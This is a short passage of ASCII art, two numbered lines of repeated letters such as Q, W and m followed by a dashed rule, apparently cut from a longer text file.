QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ 34 | QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ 35 | --------------------------------------------------------------------------------